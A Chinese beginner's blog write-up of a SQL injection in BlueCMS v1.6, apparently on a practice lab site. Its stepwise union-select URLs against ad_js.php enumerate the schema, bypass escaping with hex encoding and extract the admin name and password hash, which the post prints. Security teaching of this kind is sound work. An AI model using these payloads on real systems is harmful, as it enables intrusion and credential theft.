萌新也能找CMS漏洞

萌新也能找CMS漏洞

有时间可以拿这个 CMS 去学习代码审计

image


BlueCMS_V1.6漏洞

通过传送门来到 BlueCMS,在网页的最下方获取到了版本

已知 CMS 和版本号,就可以搜索相关 CMS 版本的漏洞了

https://cloud.tencent.com.cn/developer/article/1808277

image


SQL 注入(ad_js.php)

SQL 注入点

sql注入点存在的页面:
http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1


SQL 注入语句

回显的位置在注释里面,比较神奇

注入点
http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,7

数据库名称
http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,database()

表名
有转义不能使用 http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema='blue_test'
http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()

字段名,需要通过编码绕过一下
http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e

用户名和密码
http://pu2lh35s.ia.aqlab.cn//bluecms/uploads/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(admin_name,0x3a,pwd) from blue_admin

image
image
image
image
image
image


用户名和密码

通过 SQL 注入获取的用户和密码为
admin:46120aa4aa7b5b27cc81eb6cd0b8b95d

image

posted @ 2025-11-09 00:26  KnowingFish  阅读(1)  评论(0)    收藏  举报